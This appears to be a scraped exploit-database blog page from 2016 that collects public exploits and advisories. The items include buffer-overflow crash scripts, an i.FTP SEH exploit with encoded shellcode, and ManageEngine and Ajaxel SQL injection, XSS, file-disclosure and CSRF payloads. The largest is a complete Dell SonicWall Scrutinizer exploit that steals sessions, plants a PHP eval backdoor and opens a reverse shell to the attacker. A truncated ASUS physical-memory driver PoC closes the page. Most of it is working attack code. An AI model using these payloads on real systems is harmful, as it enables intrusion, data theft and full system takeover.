#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Title : RPCScan v2.03 Hostname/IP Field Local BoF PoC
# Discovery by : Irving Aguilar
# Email : im.aguilar@protonmail.ch
# Discovery Date : 05.05.2016
# Software Link : http://www.mcafee.com/us/downloads/free-tools/rpcscan.aspx#
# Tested Version : 2.03
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 7 Enterprise SP1 x64 en
#
#
# Steps to Produce the Crash:
# 1.- Run python code : python RPCScan-BoF.py
# 2.- Open RPCScan-BoF.txt and copy content to clipboard
# 3.- Open RPCScan2.exe
# 4.- Clic button Ok
# 5.- Paste Clipboard Scan > Hostname/IP
# 6.- Clic on add button (->)
# 7.- Clic button Aceptar
# 8.- Crashed
buffer = "\x41" * 388
eip = "\x42" * 4
f = open ("RPCScan-BoF.txt", "w")
f.write(buffer + eip)
f.close()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863287227
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Title : CIScanv1.00 Hostname/IP Field Local BoF PoC
# Discovery by : Irving Aguilar
# Email : im.aguilar@protonmail.ch
# Discovery Date : 05.05.2016
# Software Link : http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx#
# Tested Version : 1.00
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 7 Enterprise SP1 x64 en
#
#
# Steps to Produce the Crash:
# 1.- Run python code : python CIScanv1-BoF.py
# 2.- Open CIScanv1-BoF.txt and copy content to clipboard
# 3.- Open CIScan.exe
# 4.- Clic button Ok
# 5.- Paste Clipboard Scan > Hostname/IP
# 6.- Clic on add button (->)
# 7.- Clic button Aceptar
# 8.- Crashed
buffer = "\x41" * 388
eip = "\x42" * 4
f = open ("CIScanv1-BoF.txt", "w")
f.write(buffer + eip)
f.close()
# Exploit Title: DotNetNuke 07.04.00 Administration Authentication Bypass
# Date: 06-05-2016
# Exploit Author: Marios Nicolaides
# Vendor Homepage: http://www.dnnsoftware.com/
# Software Link: https://dotnetnuke.codeplex.com/releases/view/611324
# Version: 07.04.00
# Tested on: Microsoft Windows 7 Professional (64-bit)
# Contact: marios.nicolaides@outlook.com
# CVE: CVE-2015-2794
# Category: webapps
1. Description
DotNetNuke 07.04.00 does not prevent anonymous users from accessing the installation wizard, as a result a remote attacker
can 'reinstall' DNN and get unauthorised access as a SuperUser.
Previous versions of DotNetNuke may also be affected.
2. Proof of Concept
The exploit can be demonstrated as follows:
If the DNN SQL database is in the default location and configuration:
- Database Type: SQL Server Express File
- Server Name: .\SQLExpress
- Filename: Database.mdf (This is the default database file of DNN. You can find it at \App_Data\Database.mdf)
The following URL will create an account with the username: 'host', password: 'dnnhost':
http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=&culture=en-US&executeinstall
If the DNN SQL database is not in the default configuration then the attacker must know its configuration or be able to brute-force guess it.
A. Visit http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=
B. Fill in the form and submit it:
Username: whatever
Password: whateverpassword
Email address: whatever@example.com (You will get an error msg due to client-side validation, just ignore it)
Website Name: Whatever Site Name
Database Setup Custom:
- Database Type: SQL Server Express File
- Server Name: .\SQLExpress
- This is the SQL Server instance name that we need to find or brute-force guess it in order to complete the installation.
- If MSSQL database is accessible you can use auxiliary/scanner/mssql/mssql_ping from MSF to get it.
- Filename: Database.mdf
- This is the default database file of DNN. You can find it at "\App_Data\Database.mdf".
- Tick the box Run Database as a Database Owner
C. You will probably get an error. Remove the "__VIEWSTATE=" parameter from the URL and press enter.
D. When the installation completes click Visit Website.
E. Login with your credentials.
3. Solution:
Update to version 07.04.01
https://dotnetnuke.codeplex.com/releases/view/615317
4. References:
http://www.dnnsoftware.com/platform/manage/security-center (See 2015-05 (Critical) unauthorized users may create new host accounts)
http://www.dnnsoftware.com/community-blog/cid/155198/workaround-for-potential-security-issue
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=719
There is a use-after-free that appears to be related to rendering the display based on multiple scripts. A PoC is attached, tested on Windows only. Note the PoC is somewhat unreliable on some browsers, sometimes it needs to render a minute or two in the foreground before crashing. This is related to unreliability in the freed object being reallocated as a value that causes the crash, not unreliability in the underlying bug (it crashes immediately in a debug build of Flash). With enough effort, an attacker could likely trigger the issue immediately.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39778.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=759
There is a use-after-free in MovieClip.duplicateMovieClip.If an action associated with the MovieClip frees the clip provided as the initObject parameter to the call, it will be used after it is freed.A PoC is attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39779.zip
[SPSA-2016-02/ManageEngine ApplicationsManager]------------------------------
SECURITY ADVISORY: SPSA-2016-02/ManageEngine Applications Manager Build No: 12700
Affected Software: ManageEngine Applications Manager Build No: 12700
Vulnerability: Information Disclosure and Un-Authenticated SQL
injection.
CVSSv3: 9.3
Severity: Critical
Release Date: 2016-05-05
I. Background
~~~~~~~~~~~~~
ManageEngine Applications Manager is an Application Performance Monitoring across physical, virtual and cloud environments.
II. Description
~~~~~~~~~~~~~~~
For details about the fix please visit https://www.manageengine.com/products/applications_manager/release-notes.html
Information Disclosure:
~~~~~~~~~~~~~~~~~~~~~~~
Some scripts were accessible without authentication, which allowed public access to sensitive data such as licensing information and Monitored Server Details like name IP and maintenance schedule.
POC
~~~
License Information:
https://ManageEngineHost/jsp/About.jsp?context=/CAMGlobalReports.do?method=disableReports
List of Maintenance tasks:
https://ManageEngineHost/downTimeScheduler.do?method=maintenanceTaskListView&tabtoLoad=downtimeSchedulersDiv
Details of Maintenance tasks with details about monitored server:
https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=2&edit=true&readonly=false
SQL Injection:
~~~~~~~~~~~~~~
The downTimeScheduler.do script is vulnerable to a Boolean based blind, and Union based SQL injection, that allows complete unauthorized access to the back-end database, according to the level of privileges of the application database user.
Vulnerable URL:
https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
Vulnerable Parameter: GET parameter taskid
PoC:
~~~~
Boolean Based Blind SQL Injection PoC:
https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
and 1=1 (True)
https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
and 1=2 (False)
The following will include the Database Name in the Schedule Details
Description text box:
Union-Based SQL Injection PoC: Number of Columns 15, ORDER BY was
usable.
MSSQL: During our testing, the payload needed to be URL Encoded.
https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=-1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2BISNULL%28CAST%28%28SELECT%20DB_NAME%28%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28107%29%2BCHAR%28112%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
MYSQL: During our testing, the payload did not need URL Encoding.
https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=-1%20UNION%20ALL%20SELECT%201,2,database(),4,5,6,7,8,9,10,11,12,13,14,15%20--
III. Impact
~~~~~~~~~~~
Information Disclosure Impact:
An attacker might make use of the intelligence gathered through information leakages such as these for further attacks against the application, and its underlying infrastructure
Un-Authenticated SQL Injection Impact:
Access to sensitive information, stored in the application Database server, depending on the privileges of the application's database user.
IV. Remediation
~~~~~~~~~~~~~~~
Apply Vendor supplied patch build #12710, details are available at
https://www.manageengine.com/products/applications_manager/release-notes.html
V. Disclosure
~~~~~~~~~~~~~
Reported By: Saif El-Sherei, @saif_sherei, saif@sensepost.com
Discovery Date: 2016-02-29
Vendor Informed: 2016-03-04
Advisory Release Date: 2016-05-05
Patch Release Date: 2016-04-28
Advisory Updated: 2016-05-05
---------------------------------[SPSA-2016-02/ManageEngine ApplicationsManager]---
Ajaxel CMS 8.0 Multiple Vulnerabilities
Vendor: Ajaxel
Product web page: http://www.ajaxel.com
Affected version: 8.0 and below
Summary: Ajaxel CMS is very simple ajaxified CMS and framework
for any project needs.
Desc: Ajaxel CMS version 8.0 and below suffers from multiple
vulnerabilities inlcuding LFI, XSS, SQL injection and remote
code execution via CSRF.
Tested on: Apache 2.4.10
MySQL 5.5.46
Vendor status:
[13.04.2016] Vulnerabilities discovered.
[14.04.2016] Vendor contacted.
[18.04.2016] Vendor releases patch for version 8.0 to address these issues.
[05.05.2016] Public security advisory released.
Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski
[dizzyduck_at_zeroscience.mk]
1. Reflected XSS:
-----------------
GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1
Host: 192.168.10.5
HTTP/1.0 404 Not Found
...
...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200,
USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/',
REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0,
URL_KEY_ADMIN:'cms',...
2. SQL Injection:
-----------------
http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi>
3. Local File Disclosure:
-------------------------
http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd
4. Cross-Site Request Forgery - RCE PoC:
----------------------------------------
<html>
<body>
<form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load"
method="POST">
<input type="hidden" name="data[eval]"
value="phpinfo();" />
<input type="hidden" name="a" value="eval" />
<input type="hidden"
name="settings_eval_tab_eval-submitted" value="1" />
<input type="submit" value="Execute" />
</form>
</body>
</html>
#!/usr/bin/python
# Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit
# Date: 3-5-2016
# Exploit Author: Tantaryu MING
# Vendor Homepage: http://www.memecode.com/iftp.php
# Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Version: 2.21
# Tested on: Windows 7 SP1 x86_64
# How to exploit: Connect -> Host Address / URL -> copy + paste content of evil.txt -> Press 'Connect' button
'''
msfvenom -p windows/exec CMD=calc -e x86/alpha_upper -a x86 -f c -b '\x00\x0d\x20\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferREgister=EAX
'''
shellcode = (
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
"\x4c\x5a\x48\x4b\x32\x35\x50\x33\x30\x43\x30\x33\x50\x4d\x59"
"\x4a\x45\x36\x51\x39\x50\x42\x44\x4c\x4b\x30\x50\x56\x50\x4c"
"\x4b\x51\x42\x34\x4c\x4c\x4b\x30\x52\x35\x44\x4c\x4b\x42\x52"
"\x31\x38\x44\x4f\x58\x37\x51\x5a\x57\x56\x30\x31\x4b\x4f\x4e"
"\x4c\x47\x4c\x35\x31\x43\x4c\x53\x32\x56\x4c\x51\x30\x59\x51"
"\x58\x4f\x34\x4d\x53\x31\x49\x57\x4b\x52\x4a\x52\x50\x52\x50"
"\x57\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x50\x4a\x37\x4c\x4c\x4b"
"\x30\x4c\x54\x51\x52\x58\x4b\x53\x50\x48\x35\x51\x38\x51\x50"
"\x51\x4c\x4b\x31\x49\x47\x50\x33\x31\x48\x53\x4c\x4b\x51\x59"
"\x32\x38\x4d\x33\x47\x4a\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x35"
"\x51\x59\x46\x56\x51\x4b\x4f\x4e\x4c\x59\x51\x48\x4f\x54\x4d"
"\x45\x51\x58\x47\x57\x48\x4d\x30\x33\x45\x4a\x56\x55\x53\x53"
"\x4d\x4c\x38\x57\x4b\x33\x4d\x47\x54\x52\x55\x4b\x54\x30\x58"
"\x4c\x4b\x31\x48\x36\x44\x43\x31\x59\x43\x43\x56\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x46\x38\x35\x4c\x45\x51\x4e\x33\x4c\x4b"
"\x34\x44\x4c\x4b\x45\x51\x58\x50\x4b\x39\x51\x54\x36\x44\x57"
"\x54\x51\x4b\x31\x4b\x33\x51\x36\x39\x51\x4a\x30\x51\x4b\x4f"
"\x4b\x50\x51\x4f\x31\x4f\x30\x5a\x4c\x4b\x45\x42\x4a\x4b\x4c"
"\x4d\x51\x4d\x33\x5a\x55\x51\x4c\x4d\x4d\x55\x58\x32\x35\x50"
"\x45\x50\x45\x50\x56\x30\x33\x58\x30\x31\x4c\x4b\x42\x4f\x4d"
"\x57\x4b\x4f\x38\x55\x4f\x4b\x4a\x50\x4e\x55\x39\x32\x50\x56"
"\x52\x48\x59\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x37"
"\x4c\x35\x56\x33\x4c\x44\x4a\x4d\x50\x4b\x4b\x4b\x50\x42\x55"
"\x33\x35\x4f\x4b\x37\x37\x55\x43\x53\x42\x52\x4f\x53\x5a\x33"
"\x30\x46\x33\x4b\x4f\x39\x45\x53\x53\x45\x31\x52\x4c\x35\x33"
"\x35\x50\x41\x41"
)
eax_zeroed = '\x25\x2E\x2E\x2E\x2E'
eax_zeroed += '\x25\x11\x11\x11\x11'
align_to_eax = "\x54\x58" # Get ESP and pop it into EAX
align_to_eax += "\x2d\x7d\x7d\x7d\x7d" # SUB EAX, 0x7d7d7d7d
align_to_eax += "\x2d\x01\x01\x01\x01" # SUB EAX, 0x01010101
align_to_eax += "\x2d\x01\x01\x02\x02" # SUB EAX, 0x02020101
align_to_eax += "\x2d\x7c\x73\x7f\x7f" # SUB EAX, 0x7f7f737c
buffer = "\x41" * 1865
buffer += "\x42\x42\x71\x04" # Pointer to Next SEH Record
buffer += "\x78\x2a\x01\x10" # SEH HANDLER
buffer += eax_zeroed
buffer += align_to_eax
buffer += "\x43" * 5
buffer += shellcode
buffer += "E" * 4
f = open('exploit.txt', "wb")
f.write(buffer)
f.close()
#!/usr/local/bin/python
"""
Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQL Injection Remote Code Execution
sonic.py by mr_me@offensive-security.com
greets to @brandonprry ;->
Summary:
========
This exploits an pre-auth SQL Injection in the login.php script within an update statement to steal session data. You could also steal login creds
which require absolutely no hash cracking since the target uses symmetric encryption. It then exploits a second post-auth SQL Injection vulnerability
that writes a shell to the target using a relative path and gets SYSTEM.
Vulnerability:
==============
In html/d4d/login.php on lines 27-34:
}else if ($_REQUEST['setSkin']){
echo setUserSkin(
array(
'db' => $db,
'user_id' => $_REQUEST['user_id'],
'skin' => $_REQUEST['setSkin']
)
);
Then, on lines 46-62:
function setUserSkin($args){
$db = $args['db'];
$result = $db->query("
UPDATE plixer.userpreferences
SET setting = '$args[skin]'
WHERE prefCode = 'skin'
AND users_id = $args[user_id]");
if ($args['user_id'] == 1){
$result2 = $db->query("
UPDATE plixer.serverprefs
SET currentVal = '$args[skin]'
WHERE langKey = 'skin'");
}
}
For the post-auth bug, see https://gist.github.com/brandonprry/76741d9a0d4f518fe297
Example:
========
saturn:module-03 mr_me$ ./sonic.py
Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t
mr_me@offensive-security.com
(!) usage: ./poc.py <target> <connectback:port>
saturn:module-03 mr_me$ ./poc.py 172.16.175.147 172.16.175.1:1111
Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t
mr_me@offensive-security.com
(+) target is vuln, proceeding
(+) waiting for session data... starting at: 2016-05-06 16:31:37.022818
(+) awesome, appears like someone has logged in...
(+) it took 0:00:05.020670 to detect valid session data
(+) extracting session data... 1:NfS5yetP49TXCqP5
(+) backdooring target...
(+) starting handler on port 1111
(+) connection from 172.16.175.147
(+) pop thy shell!
whoami
nt authority\system
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 172.16.175.147
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.175.2
*** Connection closed by remote host ***
"""
import re
import sys
import requests
import datetime
import socket
import telnetlib
import email.utils as eut
from threading import Thread
from base64 import b64encode as b64e
lower_value = 0
upper_value = 126
def banner():
return """\n\tDell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t\n\tmr_me@offensive-security.com\n"""
def ct():
return datetime.datetime.now()
def parsedate(text):
return datetime.datetime(*eut.parsedate(text)[:6])
def check_args():
global target, lserver, lport
if len(sys.argv) < 3:
return False
cb = sys.argv[2]
target = "http://%s" % sys.argv[1]
if not ":" in cb:
return False
if not cb.split(":")[1].isdigit():
return False
lserver = cb.split(":")[0]
lport = int(cb.split(":")[1])
return True
def validate():
r = requests.get("%s/index.html" % target)
if re.search('Scrutinizer 11.0.1', r.text):
return True
return False
def have_sessions(time):
"""
check if we have sessions
"""
sqli = "if(ascii(substring((select count(session_id) from sessions),1,1))!=48,sleep(%s),null)" % (time)
url = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
st = ct()
r = requests.get("%s/%s" % (target, url))
delta = ct()-st
if int(delta.seconds) < time:
return False
return True
def do_time_based_blind(sql, time):
lower = lower_value
upper = upper_value
while lower < upper:
try:
mid = (lower + upper) / 2
url = "%s/%s" % (target, ("%s>%s,sleep(%s),null)" % (sql, str(mid), time)))
st = ct()
r = requests.get(url)
delta = ct()-st
if int(delta.seconds) >= time:
lower = mid + 1
else:
upper = mid
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
if lower > lower_value and lower < upper_value:
value = lower
else:
url = "%s/%s" % (target, ("%s=%s,sleep(%s),null)" % (sql, str(lower), time)))
st = ct()
r = requests.get(url)
delta = ct()-st
if int(delta.seconds) >= time:
value = lower
return value
def steal_session_length():
xlen = ""
sqli = "if(ascii(substring((select length(length(concat(user_id,0x3a,session_id))) from sessions limit 0,1),1,1))"
qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
zlen = int(chr(do_time_based_blind(qry_str, 5)))
for i in range(0, zlen):
sqli = "if(ascii(substring((select length(concat(user_id,0x3a,session_id)) from sessions limit 0,1),%d,1))" % (i+1)
qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
xlen += chr(do_time_based_blind(qry_str, 5))
return int(xlen)
def steal_session(length, time):
session = ""
for i in range(0, length):
sqli = "if(ascii(substring((select concat(user_id,0x3a,session_id) from sessions limit 0,1),%d,1))" % (i+1)
qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
char = chr(do_time_based_blind(qry_str, 5))
session += char
sys.stdout.write(char)
sys.stdout.flush()
return session
# build the reverse php shell
def build_php_code():
phpkode = ("""
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
phpkode += ("""$dis=@ini_get('disable_functions');""")
phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
phpkode += ("""$nofuncs='no exec functions'; """)
phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (lserver, lport))
phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (lserver, lport))
phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
phpkode += ("""}@socket_close($s);} """)
return phpkode
def kill_shot(stolen_data):
user_id = stolen_data.split(":")[0]
sessionid = stolen_data.split(":")[1]
url = "d4d/dashboards.php?deleteTab=1 union select '<?php eval(base64_decode($_COOKIE[\\'awae\\'])); ?>' into outfile '../../html/d4d/offsec.php'"
requests.get("%s/%s" % (target, url), cookies={"userid": user_id, "sessionid": sessionid})
def exec_code():
phpkodez = b64e(build_php_code())
handlerthr = Thread(target=handler, args=(lport,))
handlerthr.start()
requests.get("%s/d4d/offsec.php" % (target), cookies={"awae": phpkodez})
def handler(lport):
print "(+) starting handler on port %d" % lport
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def main():
if check_args():
if validate():
print "(+) target is vuln, proceeding"
st = ct()
print "(+) waiting for session data... starting at: %s" % ct()
# we dont use recursion since we could get stack exhaustion.
while not have_sessions(5):
pass
print "(+) awesome, appears like someone has logged in... "
print "(+) it took %s to detect valid session data" % (ct()-st)
sys.stdout.flush()
sys.stdout.write("(+) extracting session data... ")
dataz = steal_session(steal_session_length(), 5)
print "\n(+) backdooring target..."
kill_shot(dataz)
exec_code()
else:
print "(!) usage: %s <target> <connectback:port>" % sys.argv[0]
if __name__ == "__main__":
print banner()
main()
ZeewaysCMS Multiple Vulnerabilities
[Software]
- ZeewaysCMS
[Vendor Product Description]
- ZeewaysCMS is a Content Management System and a complete Web & Mobile Solution developed by Zeeways for Corporates,
Individuals or any kind of Business needs.
- Site: http://www.zeewayscms.com/
[Advisory Timeline]
[25.03.2016] Vulnerability discovered.
[25.03.2016] Vendor contacted.
[29.03.2016] Follow up with the vendor.
[29.03.2016] Vendor responded asking for details.
[29.03.2016] Advisory and details sent to the vendor.
[06.04.2016] Follow up with the vendor. No response received.
[06.05.2016] Public security advisory released.
[Bug Summary]
- Directory Traversal
- Cross Site Scripting (Stored)
[Impact]
- High
[Affected Version]
- Unknown
[Tested on]
- Apache/2.2.27
- PHP/5.4.28
[Advisory]
- ID: ZSL-2016-5319
- URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5319.php
[Bug Description and Proof of Concept]
- ZeewaysCMS suffers from a file inclusion vulnerability (LFI) when encoded input passed thru the 'targeturl' GET
parameter is not properly verified before being used to include files. This can be exploited to include files from
local resources with directory traversal attacks and URL encoded NULL bytes.
https://en.wikipedia.org/wiki/Directory_traversal_attack
- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed
via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in context of an affected site.
https://en.wikipedia.org/wiki/Cross-site_scripting
[Proof-of-Concept]
1. Directory Traversal:
http://localhost/demo//createPDF.php?targeturl=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=&&pay_id=4&&type=actual
Parameters: targeturl (GET)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Cross Site Scripting (Stored)
http://localhost/demo/profile
Parameters: screen_name, f_name, l_name, uc_email, uc_mobile, user_contact_num (POST)
Payload(s):
Content-Disposition: form-data; name="screen_name"
"><script><<imgIMG SRC=oi onerror=JaVaScript:alert(1)>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"
/*
Source: http://rol.im/asux/
ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write
PoC by slipstream/RoL - https://twitter.com/TheWack0lian - http://rol.im/chat/
The ASUS "Generic Function Service" includes a couple of drivers, ASMMAP.sys / ASMMAP64.sys,
the version resources describe them as "Memory mapping Driver".
This description is very accurate, it has a pair of ioctls, 0x9C402580 and 0x9C402584, that map or
unmap to the calling process' address space ANY PART OF PHYSICAL MEMORY, with READ/WRITE permissions.
Using code that has been copypasta'd a bunch of times, but seems to originate from a sample driver for NT 3.1.
1993 vintage code, everybody.
It also has a couple of other ioctls that allocate or free some RAM and gives the physical and virtual pointers
to it, and another one that can make any I/O request (does in/out byte/word/dword with parameters given in the ioctl buffer,
and returns the result for the case of in). These.. don't really matter, I guess? Well, I guess you could mess with SMM
or other issues easily...
This PoC can dump a block of physical memory to disk, and write to a block of physical memory from a file.
I wrote it in C# so others can easily add the ASMMap_MapMem class to their powershell exploitation frameworks, if they so want.
To ASUS: MS locked PhysicalMemory down in 2004. Don't use 1993 code to remove the restrictions, and let even unprivileged users
access it (where back before it was locked to ring0, only SYSTEM could access it).
To MS: why did you even sign asmmap/asmmap64? Probably automation. Come on, why does signing even exist if you sign whatever driver
an OEM asks you to, without checking?
*/
// This uses pointers, so compile with /unsafe.
using System;
using System.ComponentModel;
using System.Globalization;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;
public class ASMMap_MapMem : IDisposable {
public const uint IOCTL_MAPMEM = 0x9C402580;
public const uint IOCTL_UNMAPMEM = 0x9C402584;
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern SafeFileHandle CreateFile(
string lpFileName,
[MarshalAs(UnmanagedType.U4)] FileAccess dwDesiredAccess,
[MarshalAs(UnmanagedType.U4)] FileShare dwShareMode,
IntPtr lpSecurityAttributes,
[MarshalAs(UnmanagedType.U4)] FileMode dwCreationDisposition,
[MarshalAs(UnmanagedType.U4)] FileAttributes dwFlagsAndAttributes,
IntPtr hTemplateFile);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool DeviceIoControl(
SafeFileHandle hDevice,
uint IoControlCode,
ref MapMemIoctl InBuffer,
int nInBufferSize,
ref MapMemIoctl OutBuffer,
int nOutBufferSize,
IntPtr pBytesReturned,
IntPtr Overlapped
);
[StructLayout(LayoutKind.Sequential)]
public unsafe struct MapMemIoctl {
public ulong PhysicalAddress;
public byte* VirtualAddress;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=2)]
public uint[] Length;
